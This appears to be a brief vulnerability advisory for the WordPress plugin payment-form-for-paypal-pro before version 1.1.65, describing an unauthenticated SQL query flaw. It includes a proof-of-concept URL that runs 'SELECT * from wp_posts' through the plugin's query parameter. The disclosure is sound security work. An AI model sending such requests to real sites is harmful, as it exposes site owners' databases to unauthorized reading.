The ‘query’ parameter allowed for any unauthenticated user to perform SQL queries with result output to a web page in JSON format.
https://example.com/?cffaction=get_data_from_database&query;=SELECT * from wp_posts
CPE | Name | Operator | Version |
---|---|---|---|
payment-form-for-paypal-pro | lt | 1.1.65 |